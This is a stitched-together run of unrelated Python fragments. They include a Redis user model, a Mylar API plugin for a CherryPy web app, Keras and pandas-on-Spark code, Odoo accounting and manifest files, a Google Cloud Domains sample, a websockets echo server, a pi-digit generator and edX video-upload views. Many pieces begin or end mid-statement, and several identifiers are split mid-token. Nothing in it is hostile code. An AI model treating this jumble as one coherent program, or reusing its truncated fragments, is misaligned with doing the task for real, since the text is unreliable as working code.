        kwargs['pk'] = pk
        # Persist supplied fields (at minimum the pk itself is written).
        db1.hmset('user::{}'.format(pk), kwargs)
        # object.__setattr__ is used because our own __setattr__ would
        # write these bookkeeping attributes into the redis hash.
        super(User, self).__setattr__('pk', pk)
        super(User, self).__setattr__(
            '__info__',
            db1.hgetall(self.db_key) or {}
        )
        # Redis returns byte strings; decode every cached value to unicode.
        for k, v in self.__info__.iteritems():
            self.__info__[k] = v.decode('utf-8')

    @property
    def short_info(self):
        # Compact summary dict of the commonly displayed fields.
        return {field: getattr(self, field) for field in [
            'fio', 'sex', 'avatar', 'battles', 'wins',
            'defeats', 'last_update'
        ]}

    @property
    def db_key(self):
        # Redis hash key holding this user's fields.
        return 'user::{}'.format(self.pk)

    @property
    def fio(self):
        # Display name; tolerates missing parts (None -> empty string).
        return u'{} {}'.format(self.last_name or u'', self.first_name or u'')

    @property
    def battles(self):
        # Counter fields are stored as strings in redis; coerce to int.
        return int(self.__info__.get('battles', 0))

    @property
    def wins(self):
        return int(self.__info__.get('wins', 0))

    @property
    def defeats(self):
        return int(self.__info__.get('defeats', 0))

    @property
    def last_update(self):
        return int(self.__info__.get('last_update', 0))

    def __setattr__(self, attr, value):
        # Write-through: update the local cache and the redis hash.
        self.__info__[attr] = value
        db1.hset(self.db_key, attr, value)

    def __getattr__(self, attr):
        # Called only for attributes not found normally; missing -> None.
        return self.__info__.get(attr)

    def incr(self, attr, by=1):
        # Atomic increment in redis; the local cache is NOT refreshed.
        db1.hincrby(self.db_key, attr, by)


def get_user_by_service(service, service_user_id):
    """Look up a User through a service-id mapping; None when unknown."""
    user_pk = db1.get('{}_user_id::{}'.format(service, service_user_id))
    if user_pk:
        return User(pk=user_pk)


def add_service_to_user(service, service_user_id, user_pk):
    """Bind a service account id to an existing user, in both directions."""
    db1.set('{}_user_id::{}'.format(service, service_user_id), user_pk)
    user = User(pk=user_pk)
    # Stored via User.__setattr__, so it also lands in the user's hash.
    setattr(user, '{}_user_id'.format(service), service_user_id)
'}, {'type': 'text', 'label': 'IP / Host *', 'name': 'mylar_host'}, {'type': 'text', 'label': 'Port *', 'name': 'mylar_port'}, {'type': 'text', 'label': 'Basepath', 'name': 'mylar_basepath'}, {'type': 'text', 'label': 'API key', 'name': 'mylar_apikey'}, {'type': 'bool', 'label': 'Use SSL', 'name': 'mylar_ssl'}, {"type": "text", "label": "Reverse proxy link", "placeholder": "", "desc": "Reverse proxy link ex: https://hp.domain.com", "name": "mylar_reverse_proxy_link"} ] }) @cherrypy.expose() @require() def index(self): return serve_template('mylar.html', scriptname='mylar', webinterface=Mylar.webinterface() ) @cherrypy.expose() @require() def GetThumb(self, url=None, thumb=None, h=None, w=None, o=100): """ Parse thumb to get the url and send to htpc.proxy.get_image """ self.logger.debug("Trying to fetch image via %s", url) if url is None and thumb is None: # To stop if the image is missing return # Should never used thumb, to lazy to remove it if thumb: url = thumb return get_image(url, h, w, o) @cherrypy.expose() @require() def viewcomic(self, artist_id): response = self.fetch('getComic&id=%s' % artist_id) for a in response['comic']: a['StatusText'] = _get_status_icon(a['Status']) a['can_download'] = True if a['Status'] not in ('Downloaded', 'Snatched', 'Wanted') else False template = htpc.LOOKUP.get_template('mylar_view_comic.html') return template.render( scriptname='mylar_view_comic', comic_id=artist_id, comic=response['comic'][0], comicimg=response['comic'][0]['ComicImageURL'], issues=response['issues'], description=response['comic'][0]['Description'], module_name=htpc.settings.get('mylar_name', 'Mylar') ) @staticmethod def _build_url(ssl=None, host=None, port=None, base_path=None): ssl = ssl or htpc.settings.get('mylar_ssl') host = host or htpc.settings.get('mylar_host') port = port or htpc.settings.get('mylar_port') path = fix_basepath(htpc.settings.get('mylar_basepath', '/')) url = '{protocol}://{host}:{port}{path}'.format( protocol='https' if ssl else 
'http', host=host, port=port, path=path, ) return url @staticmethod def webinterface(): url = Mylar._build_url() if htpc.settings.get('mylar_reverse_proxy_link'): url = htpc.settings.get('mylar_reverse_proxy_link') return url @staticmethod def _build_api_url(command, url=None, api_key=None): return '{url}api?apikey={api_key}&cmd={command}'.format( url=url or Mylar._build_url(), api_key=api_key or htpc.settings.get('mylar_apikey'), command=command, ) @cherrypy.expose() @cherrypy.tools.json_out() @require() def getserieslist(self): return self.fetch('getIndex') @cherrypy.expose() @cherrypy.tools.json_out() @require() def GetWantedList(self): return self.fetch('getWanted') @cherrypy.expose() @cherrypy.tools.json_out() @require() def SearchForComic(self, name): return self.fetch('findComic&%s' % urlencode({'name': name.encode(encoding='UTF-8', errors='strict')})) @cherrypy.expose() @require() def RefreshComic(self, Id): return self.fetch('refreshComic&id=%s' % Id, text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def DeleteComic(self, Id): return self.fetch('delComic&id=%s' % Id, text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def PauseComic(self, Id): return self.fetch('pauseComic&id=%s' % Id, text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def ResumeComic(self, Id): return self.fetch('resumeComic&id=%s' % Id, text=True) @cherrypy.expose() @require() def QueueIssue(self, issueid=None, new=False, **kwargs): # Force check if new: return self.fetch('queueIssue&id=%s&new=True' % issueid, text=True) return self.fetch('queueIssue&id=%s' % issueid, text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def UnqueueIssue(self, issueid, name=''): self.logger.debug('unqued %s' % name) return self.fetch('unqueueIssue&id=%s' % issueid, text=True) @cherrypy.expose() @require() def DownloadIssue(self, issueid, name=''): """ downloads a issue via api and returns it to the browser """ self.logger.debug('Downloading issue 
%s' % name) getfile = self.fetch('downloadIssue&id=%s' % issueid, img=True) try: with closing(StringIO()) as f: f = StringIO() f.write(getfile) return cherrypy.lib.static.serve_fileobj(f.getvalue(), content_type='application/x-download', disposition=None, name=name, debug=False) except Exception as e: self.logger.error('Failed to download %s %s %s' % (name, issueid, e)) @cherrypy.expose() @cherrypy.tools.json_out() @require() def AddComic(self, id, **kwargs): self.logger.debug('Added %s to mylar' % kwargs.get('name', '')) return self.fetch('addComic&id=%s' % id) @cherrypy.expose() @cherrypy.tools.json_out() @require() def GetHistoryList(self): return self.fetch('getHistory') @cherrypy.expose() @require(member_of(htpc.role_user)) def ForceSearch(self): return self.fetch('forceSearch', text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def ForceProcess(self, dir_=None): if dir_: return self.fetch('forceProcess?dir_=%s' % dir_, text=True) return self.fetch('forceProcess', text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def ForceActiveArtistsUpdate(self): return self.fetch('forceActiveComicsUpdate', text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def ShutDown(self): retu
rn self.fetch('shutdown', text=True) @cherrypy.expose() @require(mem
ber_of(htpc.role_user)) def UpDate(self): return self.fetch('update', text=True) @cherrypy.expose() @require(member_of(htpc.role_user)) def ReStart(self): return self.fetch('restart', text=True) def fetch(self, command, url=None, api_key=None, img=False, json=True, text=False): url = Mylar._build_api_url(command, url, api_key) try: if img or text: json = False result = '' self.logger.debug('calling api @ %s' % url) # set a high timeout as some requests take a while.. response = requests.get(url, timeout=120, verify=False) if response.status_code != 200: self.logger.error('failed to contact mylar') return if text: result = response.text if img: result = response.content if json: result = response.json() #self.logger.debug('Response: %s' % result) return result except Exception as e: self.logger.error("Error calling api %s: %s" % (url, e)) @cherrypy.tools.json_out() @cherrypy.expose() @require(member_of(htpc.role_user)) def ping(self, mylar_enable, mylar_name, mylar_host, mylar_port, mylar_basepath, mylar_apikey, mylar_ssl=False, mylar_reverse_proxy_link=None): url = Mylar._build_url( mylar_ssl, mylar_host, mylar_port, mylar_basepath, ) return sel
"""Custom keras layers """ # Coding: utf-8 # File name: custom_layer.py # Created: 2016-07-24 # Description: ## v0.0: File created. MergeRowDot layer. from __future__ import division from __future__ import print_function __author__ = "Hoang Nguyen" __email__ = "hoangnt@ai.cs.titech.ac.jp" from keras import backend as K from keras.engine.topology import Merge import numpy as np # >>> BEGIN CLASS RowDot <<< clas
s RowDot(Merge): """ Layer for element wise merge mul and take sum along the second axis. """ ##################################################################### __init__ def __init__
(self, layers=None, **kwargs): """ Init function. """ super(RowDot, self).__init__(layers=None, **kwargs) ######################################################################### call def call(self, inputs, **kwargs): """ Layer logic. """ print('Inputs 0 shape: %s' % str(inputs[0].shape)) print('Inputs 1 shape: %s' % str(inputs[1].shape)) l1 = inputs[0] l2 = inputs[1] output = K.batch_dot(inputs[0], inputs[1], axes=[1,1]) return output # === End CLASS MergeRowDot <<< # >>> BEGIN HELPER FUNCTIONS <<< ############################################################################ dot
Numeric array + Non-numeric array for numeric_col in self.numeric_array_df_cols: for non_numeric_col in self.non_numeric_array_df_cols: self.assertRaises(TypeError, lambda: psdf[numeric_col] + psdf[non_numeric_col]) def test_sub(self): self.assertRaises(TypeError, lambda: self.psser - "x") self.assertRaises(TypeError, lambda: self.psser - 1) psdf = self.array_psdf for col in self.array_df_cols: for other_col in self.array_df_cols: self.assertRaises(TypeError, lambda: psdf[col] - psdf[other_col]) def test_mul(self): self.assertRaises(TypeError, lambda: self.psser * "x") self.assertRaises(TypeError, lambda: self.psser * 1) psdf = self.array_psdf for col in self.array_df_cols: for other_col in self.array_df_cols: self.assertRaises(TypeError, lambda: psdf[col] * psdf[other_col]) def test_truediv(self): self.assertRaises(TypeError, lambda: self.psser / "x") self.assertRaises(TypeError, lambda: self.psser / 1) psdf = self.array_psdf for col in self.array_df_cols: for other_col in self.array_df_cols: self.assertRaises(TypeError, lambda: psdf[col] / psdf[other_col]) def test_floordiv(self): self.assertRaises(TypeError, lambda: self.psser // "x") self.assertRaises(TypeError, lambda: self.psser // 1) psdf = self.array_psdf for col in self.array_df_cols: for other_col in self.array_df_cols: self.assertRaises(TypeError, lambda: psdf[col] // psdf[other_col]) def test_mod(self): self.assertRaises(TypeError, lambda: self.psser % "x") self.assertRaises(TypeError, lambda: self.psser % 1) psdf = self.array_psdf for col in self.array_df_cols: for other_col in self.array_df_cols: self.assertRaises(TypeError, lambda: psdf[col] % psdf[other_col]) def test_pow(self): self.assertRaises(TypeError, lambda: self.psser ** "x") self.assertRaises(TypeError, lambda: self.psser ** 1) psdf = self.array_psdf for col in self.array_df_cols: for other_col in self.array_df_cols: self.assertRaises(TypeError, lambda: psdf[col] ** psdf[other_col]) def test_radd(self): self.assertRaises(TypeError, lambda: 
"x" + self.psser) self.assertRaises(TypeError, lambda: 1 + self.psser) def test_rsub(self): self.assertRaises(TypeError, lambda: "x" - self.psser) self.assertRaises(TypeError, lambda: 1 - self.psser) def test_rmul(self): self.assertRaises(TypeError, lambda: "x" * self.psser) self.assertRaises(TypeError, lambda: 2 * self.psser) def test_rtruediv(self): self.assertRaises(TypeError, lambda: "x" / self.psser) self.assertRaises(TypeError, lambda: 1 / self.psser) def test_rfloordiv(self): self.assertRaises(TypeError, lambda: "x" // self.psser) self.assertRaises(TypeError, lambda: 1 // self.psser) def test_rmod(self): self.assertRaises(TypeError, lambda: 1 % self.psser) def test_rpow(self): self.assertRaises(TypeError, lambda: "x" ** self.psser) self.assertRaises(TypeError, lambda: 1 ** self.psser) def test_and(self): self.assertRaises(TypeError, lambda: self.psser & True) self.assertRaises(TypeError, lambda: self.psser & False) self.assertRaises(TypeError, lambda: self.psser & self.psser) def test_rand(self): self.assertRaises(TypeError, lambda: True & self.psser) self.assertRaises(TypeError, lambda: False & self.psser) def test_or(self): self.assertRaises(TypeError, lambda: self.psser | True) self.assertRaises(TypeError, lambda: self.psser | False) self.assertRaises(TypeError, lambda: self.psser | self.psser) def test_ror(self): self.assertRaises(TypeError, lambda: True | self.psser) self.assertRaises(TypeError, lambda: False | self.psser) def test_from_to_pandas(self): pdf, psdf = self.array_pdf, self.array_psdf for col in self.array_df_cols: pser, psser = pdf[col], psdf[col] self.assert_eq(pser, psser.to_pandas()) self.assert_eq(ps.from_pandas(pser), psser) def test_isnull(self): pdf, psdf = self.array_pdf, self.array_psdf for col in self.array_df_cols: pser, psser = pdf[col], psdf[col] self.assert_eq(pser.isnull(), psser.isnull()) def test_astype(self): self.assert_eq(self.pser.astype(str), self.psser.astype(str)) def test_neg(self): self.assertRaises(TypeError, 
lambda: -self.psser) def test_abs(self): self.assertRaises(TypeError, lambda: abs(self.psser)) def test_invert(self): self.assertRaises(TypeError, lambda: ~self.psser) def test_eq(self): pdf, psdf = self.complex_pdf, self.complex_pdf self.assert_eq( pdf["this_array"] == pdf["that_array"], psdf["this_array"] == psdf["that_array"] ) self.assert_eq( pdf["this_struct"] == pdf["that_struct"], psdf["this_struct"] == psdf["that_struct"] ) self.assert_eq( pdf["this_array"] == pdf["this_array"], psdf["this_array"] == psdf["this_array"] ) self.assert_eq( pdf["this_struct"] == pdf["this_struct"], psdf["this_struct"] == psdf["this_struct"] ) def test_ne(self): pdf, psdf = self.complex_pdf, self.complex_pdf self.assert_eq( pdf["this_array"] != pdf["that_array"], psdf["this_array"] != psdf["that_array"] ) self.assert_eq( p
df["this_struct"] != pdf["that_struct"], psdf["this_struct"] != psdf["that_struct"] ) self.assert_eq( pdf["this_array"] != pdf["this_array"], psdf["this_array"] != psdf["this_array"] ) self.assert_eq( pdf["this_struct"] !
= pdf["this_struct"], psdf["this_struct"] != psdf["this_struct"] ) def test_lt(self): pdf, psdf = self.complex_pdf, self.complex_pdf self.assert_eq( pdf["this_array"] < pdf["that_array"], psdf["this_array"] < psdf["that_array"] ) self.assert_eq( pdf["this_struct"] < pdf["that_struct"], psdf["this_struct"] < psdf["that_struct"] ) self.assert_eq( pdf["this_array"] < pdf["this_array"], psdf["this_array"] < psdf["this_array"] ) self.assert_eq( pdf["this_struct"] < pdf["this_struct"], psdf["this_struct"] < psdf["this_struct"] ) def test_le(self): pdf, psdf = self.complex_pdf, self.complex_pdf self.assert_eq( pdf["this_array"] <= pdf["that_array"], psdf["this_array"] <= psdf["that_array"] ) self.assert_eq( pdf["this_struct"] <= pdf["that_struct"], psdf["this_struct"] <= psdf["that_struct"] ) self.assert_eq( pdf["this_array"] <= pdf["this_array"], psdf["this_array"] <= psdf["this_array"] ) self.assert_eq( pdf["this_struct"] <= pdf["this_struct"], psdf["this_struct"] <= psdf["this_struct"] ) def test_gt(self): pdf, psdf = self.complex_pdf, self.complex_pdf self.assert_eq( pdf["this_array"] > pdf["that_array"], psdf["this_array"] > psdf["that_array"] ) self.assert_eq( pdf["this_struct"] > pdf["that_struct"], psdf["this_struct"] > psdf["that_struct"] ) self.assert_eq( pdf["this_array"] > pdf["this_array"], psdf["this_array"] > psdf["this_array"] ) self.assert_eq( pdf["this_struct"] > pdf["this_struct"], psdf["this_struct"] > psdf["this_struct"] ) def test_ge(self): pdf, psdf = self.complex_pdf, self.complex_pdf self.assert_eq( pdf["this_array"] >= pdf["that_array"], psdf["this_array"] >= psdf["that_array"] ) self.assert_eq(
ase_value: val['value_residual'] = purchase_value - salvage_value if salvage_value: val['value_residual'] = purchase_value - salvage_value return {'value': val} def _entry_count(self, cr, uid, ids, field_name, arg, context=None): MoveLine = self.pool('account.move.line') return { asset_id: MoveLine.search_count(cr, uid, [('asset_id', '=', asset_id)], context=context) for asset_id in ids } _columns = { 'account_move_line_ids': fields.one2many('account.move.line', 'asset_id', 'Entries', readonly=True, states={'draft':[('readonly',False)]}), 'entry_count': fields.function(_entry_count, string='# Asset Entries', type='integer'), 'name': fields.char('Asset Name', required=True, readonly=True, states={'draft':[('readonly',False)]}), 'code': fields.char('Reference', size=32, readonly=True, states={'draft':[('readonly',False)]}), 'purchase_value': fields.float('Gross Value', required=True, readonly=True, states={'draft':[('readonly',False)]}), 'currency_id': fields.many2one('res.currency','Currency',required=True, readonly=True, states={'draft':[('readonly',False)]}), 'company_id': fields.many2one('res.company', 'Company', required=True, readonly=True, states={'draft':[('readonly',False
)]}), 'note': fields.text('Note'), 'category_id': fields.many2one('account.asset.category', 'Asset Category', required=True, change_default=True, readonly=True, states={'draft':[('readonly',False)]}), 'parent_id': fields.many2one('acc
ount.asset.asset', 'Parent Asset', readonly=True, states={'draft':[('readonly',False)]}), 'child_ids': fields.one2many('account.asset.asset', 'parent_id', 'Children Assets', copy=True), 'purchase_date': fields.date('Purchase Date', required=True, readonly=True, states={'draft':[('readonly',False)]}), 'state': fields.selection([('draft','Draft'),('open','Running'),('close','Close')], 'Status', required=True, copy=False, help="When an asset is created, the status is 'Draft'.\n" \ "If the asset is confirmed, the status goes in 'Running' and the depreciation lines can be posted in the accounting.\n" \ "You can manually close an asset when the depreciation is over. If the last line of depreciation is posted, the asset automatically goes in that status."), 'active': fields.boolean('Active'), 'partner_id': fields.many2one('res.partner', 'Partner', readonly=True, states={'draft':[('readonly',False)]}), 'method': fields.selection([('linear','Linear'),('degressive','Degressive')], 'Computation Method', required=True, readonly=True, states={'draft':[('readonly',False)]}, help="Choose the method to use to compute the amount of depreciation lines.\n"\ " * Linear: Calculated on basis of: Gross Value / Number of Depreciations\n" \ " * Degressive: Calculated on basis of: Residual Value * Degressive Factor"), 'method_number': fields.integer('Number of Depreciations', readonly=True, states={'draft':[('readonly',False)]}, help="The number of depreciations needed to depreciate your asset"), 'method_period': fields.integer('Number of Months in a Period', required=True, readonly=True, states={'draft':[('readonly',False)]}, help="The amount of time between two depreciations, in months"), 'method_end': fields.date('Ending Date', readonly=True, states={'draft':[('readonly',False)]}), 'method_progress_factor': fields.float('Degressive Factor', readonly=True, states={'draft':[('readonly',False)]}), 'value_residual': fields.function(_amount_residual, method=True, 
digits_compute=dp.get_precision('Account'), string='Residual Value'), 'method_time': fields.selection([('number','Number of Depreciations'),('end','Ending Date')], 'Time Method', required=True, readonly=True, states={'draft':[('readonly',False)]}, help="Choose the method to use to compute the dates and number of depreciation lines.\n"\ " * Number of Depreciations: Fix the number of depreciation lines and the time between 2 depreciations.\n" \ " * Ending Date: Choose the time between 2 depreciations and the date the depreciations won't go beyond."), 'prorata':fields.boolean('Prorata Temporis', readonly=True, states={'draft':[('readonly',False)]}, help='Indicates that the first depreciation entry for this asset have to be done from the purchase date instead of the first January'), 'history_ids': fields.one2many('account.asset.history', 'asset_id', 'History', readonly=True), 'depreciation_line_ids': fields.one2many('account.asset.depreciation.line', 'asset_id', 'Depreciation Lines', readonly=True, states={'draft':[('readonly',False)],'open':[('readonly',False)]}), 'salvage_value': fields.float('Salvage Value', digits_compute=dp.get_precision('Account'), help="It is the amount you plan to have that you cannot depreciate.", readonly=True, states={'draft':[('readonly',False)]}), } _defaults = { 'code': lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'account.asset.code'), 'purchase_date': lambda obj, cr, uid, context: time.strftime('%Y-%m-%d'), 'active': True, 'state': 'draft', 'method': 'linear', 'method_number': 5, 'method_time': 'number', 'method_period': 12, 'method_progress_factor': 0.3, 'currency_id': lambda self,cr,uid,c: self.pool.get('res.users').browse(cr, uid, uid, c).company_id.currency_id.id, 'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'account.asset.asset',context=context), } def _check_recursion(self, cr, uid, ids, context=None, parent=None): return 
super(account_asset_asset, self)._check_recursion(cr, uid, ids, context=context, parent=parent) def _check_prorata(self, cr, uid, ids, context=None): for asset in self.browse(cr, uid, ids, context=context): if asset.prorata and asset.method_time != 'number': return False return True _constraints = [ (_check_recursion, 'Error ! You cannot create recursive assets.', ['parent_id']), (_check_prorata, 'Prorata temporis can be applied only for time method "number of depreciations".', ['prorata']), ] def onchange_category_id(self, cr, uid, ids, category_id, context=None): res = {'value':{}} asset_categ_obj = self.pool.get('account.asset.category') if category_id: category_obj = asset_categ_obj.browse(cr, uid, category_id, context=context) res['value'] = { 'method': category_obj.method, 'method_number': category_obj.method_number, 'method_time': category_obj.method_time, 'method_period': category_obj.method_period, 'method_progress_factor': category_obj.method_progress_factor, 'method_end': category_obj.method_end, 'prorata': category_obj.prorata, } return res def onchange_method_time(self, cr, uid, ids, method_time='number', context=None): res = {'value': {}} if method_time != 'number': res['value'] = {'prorata': False} return res def _compute_entries(self, cr, uid, ids, period_id, context=None): result = [] period_obj = self.pool.get('account.period') depreciation_obj = self.pool.get('account.asset.depreciation.line') period = period_obj.browse(cr, uid, period_id, context=context) depreciation_ids = depreciation_obj.search(cr, uid, [('asset_id', 'in', ids), ('depreciation_date', '<=', period.date_stop), ('depreciation_date', '>=', period.date_start), ('move_check', '='
# -*- coding: utf-8 -*-
##############################################################################
#
#    Copyright (C) 2015 ADHOC SA  (http://www.adhoc.com.ar)
#    All Rights Reserved.
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# Odoo/OpenERP addon manifest for the "Stock Multic Fix" module.
# This dict is evaluated by the server at module-discovery time; it is data,
# not executable code.
{
    'name': 'Stock Multic Fix',
    'version': '8.0.1.0.1',          # 8.0 = target Odoo series
    'category': 'Warehouse Management',
    'sequence': 14,                  # menu/listing ordering hint
    'summary': '',
    'description': """
Stock Multic Fix
==================================
""",
    'author': 'ADHOC SA',
    'website': 'www.adhoc.com.ar',
    'license': 'AGPL-3',
    'images': [
    ],
    # Requires stock_account so the view inherits resolve.
    'depends': [
        'stock_account',
    ],
    # XML records loaded on install/upgrade.
    'data': ['stock_view.xml'
             ],
    'demo': [
    ],
    'test': [
    ],
    'installable': True,
    'auto_install': False,
    'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
from button import Button


class SellButton(Button):
    """A Button that asks its parent to sell a tower when clicked."""

    def __init__(self, image, x, y, parent):
        # No extra state of its own: forward everything to the base Button.
        super(SellButton, self).__init__(image, x, y, parent)

    def get_clicked(self):
        # Invoked on click; delegates the actual sale to the parent
        # (presumably the owning tower/menu object — confirm in button.py).
        self.parent.sell_tower()
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for DeleteRegistration
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.

# To install the latest published package dependency, execute the following:
#   python3 -m pip install google-cloud-domains


# The [START]/[END] markers below are consumed by Google's documentation
# pipeline — keep them intact.
# [START domains_v1_generated_Domains_DeleteRegistration_sync]
from google.cloud import domains_v1


def sample_delete_registration():
    # Create a client
    client = domains_v1.DomainsClient()

    # Initialize request argument(s)
    request = domains_v1.DeleteRegistrationRequest(
        name="name_value",
    )

    # Make the request (returns a long-running operation)
    operation = client.delete_registration(request=request)

    print("Waiting for operation to complete...")

    # Blocks until the server-side operation finishes.
    response = operation.result()

    # Handle the response
    print(response)

# [END domains_v1_generated_Domains_DeleteRegistration_sync]
"""Defines chart-wide shared test fixtures.""" import numpy as np import pandas as pd import pytest from bokeh.sampledata.autompg import autompg class TestData(object): """Contains properties with easy access to data used across tests.""" def __init__(self): self.cat_list = ['a', 'c', 'a', 'b'] self.list_data = [[1, 2, 3, 4], [2, 3, 4, 5]] self.array_data = [np.array(item) for item in self.list_data] self.dict_data = {'col1': self.list_data[0], 'col2': self.list_data[1]} self.pd_data = pd.DataFrame(self.dict_data) self.records_data = self.pd_data.to_dict(orient='records') self.auto_data = autompg @pytest.fixture(scope='module') def test_data(): return TestData() @pytest.fixture(scope='module') def wide_data_with_cat(test
_data): data = test_data.dict_data.copy() data['col3'] = test_data.cat_list return data @pytest.fixture(scope='module') def df_with_cat_index(test_data): return pd.DataFrame(test_data.dict_data, index=test_data.cat
_list)
#!/usr/bin/env python

import asyncio
import os
import signal

import websockets


async def echo(websocket):
    """Send every message received on the connection straight back."""
    async for message in websocket:
        await websocket.send(message)


async def main():
    """Serve the echo handler until a SIGTERM arrives."""
    # Set the stop condition when receiving SIGTERM.
    loop = asyncio.get_running_loop()
    stop = loop.create_future()
    loop.add_signal_handler(signal.SIGTERM, stop.set_result, None)

    # Each supervised process listens on its own port, derived from the
    # last two characters of its supervisor-assigned process name.
    port = 8000 + int(os.environ["SUPERVISOR_PROCESS_NAME"][-2:])
    async with websockets.serve(echo, host="localhost", port=port):
        await stop


if __name__ == "__main__":
    asyncio.run(main())
#! /usr/bin/env python
# Print digits of pi forever.
#
# The algorithm works with continued fractions and was conceived by
# Lambert Meertens.
#
# See also the ABC Programmer's Handbook, by Geurts, Meertens & Pemberton,
# published by Prentice-Hall (UK) Ltd., 1990.
#
# Fixed: the original used Python 2 'long' literals (2L, 4L, ...), which are
# a syntax error under Python 3. Plain ints are arbitrary precision there,
# so the literals simply lose the L suffix. The digit generation is also
# factored into a generator so it can be reused and tested.

import sys


def pi_digits():
    """Yield the decimal digits of pi one at a time, forever.

    Maintains two rational approximations a/b and a1/b1 of pi; a digit is
    emitted whenever both approximations agree on it, after which both are
    scaled by 10 to expose the next digit.
    """
    k, a, b, a1, b1 = 2, 4, 1, 12, 4
    while True:
        # Next approximation of the continued fraction.
        p, q, k = k * k, 2 * k + 1, k + 1
        a, b, a1, b1 = a1, b1, p * a + q * a1, p * b + q * b1
        # Yield the digits both approximations agree on.
        d, d1 = a // b, a1 // b1
        while d == d1:
            yield d
            a, a1 = 10 * (a % b), 10 * (a1 % b1)
            d, d1 = a // b, a1 // b1


def output(d):
    """Write one digit to stdout with no separator and flush immediately."""
    # Use write() to avoid spaces between the digits.
    sys.stdout.write(str(d))
    # Flush so the output is seen immediately.
    sys.stdout.flush()


def main():
    """Print digits of pi forever (never returns)."""
    for d in pi_digits():
        output(d)


if __name__ == "__main__":
    main()
or a CSV file column # containing URLs for video encodings for the named profile # (e.g. desktop, mobile high quality, mobile low quality) return _("{profile_name} URL").format(profile_name=profile) profile_whitelist = VideoUploadConfig.get_profile_whitelist() videos = list(_get_videos(course)) name_col = _("Name") duration_col = _("Duration") added_col = _("Date Added") video_id_col = _("Video ID") status_col = _("Status") profile_cols = [get_profile_header(profile) for profile in profile_whitelist] def make_csv_dict(video): """ Makes a dictionary suitable for writing CSV output. This involves extracting the required items from the original video dict and converting all keys and values to UTF-8 encoded string objects, because the CSV module doesn't play well with unicode objects. """ # Translators: This is listed as the duration for a video that has not # yet reached the point in its processing by the servers where its # duration is determined. duration_val = str(video["duration"]) if video["duration"] > 0 else _("Pending") ret = dict( [ (name_col, video["client_video_id"]), (duration_col, duration_val), (added_col, video["created"].isoformat()), (video_id_col, video["edx_video_id"]), (status_col, video["status"]), ] + [ (get_profile_header(encoded_video["profile"]), encoded_video["url"]) for encoded_video in video["encoded_videos"] if encoded_video["profile"] in profile_whitelist ] ) return { key.encode("utf-8"): value.encode("utf-8") for key, value in ret.items() } response = HttpResponse(content_type="text/csv") # Translators: This is the suggested filename when downloading the URL # listing for videos uploaded through Studio filename = _("{course}_video_urls").format(course=course.id.course) # See https://tools.ietf.org/html/rfc6266#appendix-D response["Content-Disposition"] = rfc6266.build_header( filename + ".csv", filename_compat="video_urls.csv" ) writer = csv.DictWriter( response, [ col_name.encode("utf-8") for col_name in [name_col, duration_col, 
added_col, video_id_col, status_col] + profile_cols ], dialect=csv.excel ) writer.writeheader() for video in videos: writer.writerow(make_csv_dict(video)) return response def _get_and_validate_course(course_key_string, user): """ Given a course key, return the course if it exists, the given user has access to it, and it is properly configured for video uploads """ course_key = CourseKey.from_string(course_key_string) # For now, assume all studio users that have access to the course can upload videos. # In the future, we plan to add a new org-level role for video uploaders. course = get_course_and_check_access(course_key, user) if ( settings.FEATURES["ENABLE_VIDEO_UPLOAD_PIPELINE"] and getattr(settings, "VIDEO_UPLOAD_PIPELINE", None) and course and course.video_pipeline_configured ): return course else: return None def _get_videos(course): """ Retrieves the list of videos from VAL corresponding to the videos listed in the asset metadata store. """ edx_videos_ids = [ v.asset_id.path for v in modulestore().get_all_asset_metadata(course.id, VIDEO_ASSET_TYPE) ] videos = list(get_videos_for_ids(edx_videos_ids, VideoSortField.created, SortDirection.desc)) # convert VAL's status to studio's Video Upload feature status. 
for video in videos: video["status"] = StatusDisplayStrings.get(video["status"]) return videos def _get_index_videos(course): """ Returns the information about each video upload required for the video list """ return list( { attr: video[attr] for attr in ["edx_video_id", "client_video_id", "created", "duration", "status"] } for video in _get_videos(course) ) def videos_index_html(course): """ Returns an HTML page to display previous video uploads and allow new ones """ return render_to_response( "videos_index.html", { "context_course": course, "post_url": reverse_course_url("videos_handler", unicode(course.id)), "encodings_download_url": reverse_course_url("video_encodings_download", unicode(course.id)), "previous_uploads": _get_index_videos(course), "concurrent_upload_limit": settings.VIDEO_UPLOAD_PIPELINE.get("CONCURRENT_UPLOAD_LIMIT", 0), } ) def videos_index_json(course): """ Returns JSON in the following format: { "videos": [{ "edx_video_id": "aaaaaaaa-aaaa-4aaa-aaaa-aaaaaaaaaaaa", "client_video_id": "video.mp4", "created": "1970-01-01T00:00:00Z", "duration": 42.5, "status": "upload" }] } """ return JsonResponse({"videos": _get_index_videos(course)}, status=200) def videos_post(course, request): """ Input (JSON): { "files": [{ "file_name": "video.mp4", "content_type": "video/mp4" }] } Returns (JSON): { "files": [{ "file_name": "video.mp4", "upload_url": "http://example.com/put_video" }] } The returned array corresponds exactly to the input array. 
